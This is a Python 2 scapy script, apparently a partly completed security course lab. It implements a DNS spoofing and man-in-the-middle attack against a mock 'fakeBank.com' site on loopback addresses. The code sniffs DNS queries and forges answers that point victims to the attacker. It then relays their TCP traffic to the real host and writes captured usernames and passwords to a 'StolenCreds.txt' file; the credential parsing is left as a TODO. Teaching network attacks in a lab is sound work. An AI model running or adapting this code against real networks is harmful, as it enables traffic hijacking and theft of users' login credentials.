Untitled

import argparse
import socket
from scapy.all import *

conf.L3socket = L3RawSocket
WEB_PORT = 8000
HOSTNAME = "fakeBank.com"

def resolveHostname(hostname):
        # IP address of HOSTNAME. Used to forward tcp connection.
        # Normally obtained via DNS lookup.
        return "127.1.1.1"

def log_credentials(username, password):
        # Write stolen credentials out to file
        with open("lib/attacker/StolenCreds.txt","wb") as fd:
                fd.write("Stolen credentials: username="+username+" password="+password)

def check_credentials(client_data):
        # TODO: Take a block of client data and search for username/password credentials
        # If found, log the credentials to the system by calling log_credentials().
        print client_data

def handle_tcp_forwarding(client_socket, client_ip, hostname):
        # TODO: Continuously intercept new connections from the client
        # and initiate a connection with the host in order to forward data

        client_socket.listen(1)
        while True:

                # TODO: accept a new connection from the client on client_socket and
                # create a new socket to connect to the actual host associated with hostname
                print "before accept"
                conn, addr = client_socket.accept()
                print "after accept"
                host_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                host_sock.connect((resolveHostname(hostname), WEB_PORT))

                # TODO: read data from client socket, check for credentials, and forward along to
                # host socket. Check for POST to '/post_logout' and exit after that request has completed.
                data = conn.recv(5000)
                print data
                check_credentials(data)
                host_sock.send(data)
                result = host_sock.recv(5000)
                conn.send(result)
                host_sock.close()


def dns_callback(packet,extra_args):
        # TODO: Write callback function for handling DNS packets.
        # Sends a spoofed DNS response for a query to HOSTNAME and calls handle_tcp_forwarding() after successful spoof
        source_ip, sock = extra_args
        client_ip = packet[IP].src
        print "client_ip: ", client_ip
        ip_header = IP(src=packet[IP].dst, dst=packet[IP].src)
        udp_header = UDP(sport=packet[UDP].dport, dport=packet[UDP].sport)
        # dns_header = DNS(id=packet[DNS].id, qr=1, aa=1, qd=packet[DNS].qd, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=source_ip))
        dns_header = DNS(id=packet.getlayer(DNS).id, qd=packet.getlayer(DNS).qd, qr=1, aa=1, an=DNSRR(rrname=packet.getlayer(DNS).qd.qname, ttl=10, rdata=source_ip))
        # dnsrr_header = DNSRR(rrname=HOSTNAME, rdata=source_ip)
        spoof_msg = ip_header/udp_header/dns_header
        send(spoof_msg)
        print spoof_msg.summary()

        handle_tcp_forwarding(sock, client_ip, HOSTNAME)

def sniff_and_spoof(source_ip):
        # TODO: Open a socket and bind it to the attacker's IP and WEB_PORT
        # This socket will be used to accept connections from victimized clients

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind((source_ip, WEB_PORT))

        # TODO: sniff for DNS packets on the network. Make sure to pass source_ip
        # and the socket you created as extra callback arguments.
        sniff(filter='udp port 53', prn=lambda packet, args=(source_ip,sock):dns_callback(packet, args), iface='lo')

def main():
        parser = argparse.ArgumentParser(description='Attacker who spoofs dns packet and hijacks connection')
        parser.add_argument('--source_ip',nargs='?', const=1, default="127.0.0.3", help='ip of the attacker')

        args = parser.parse_args()
        sniff_and_spoof(args.source_ip)

if __name__=="__main__":
        main()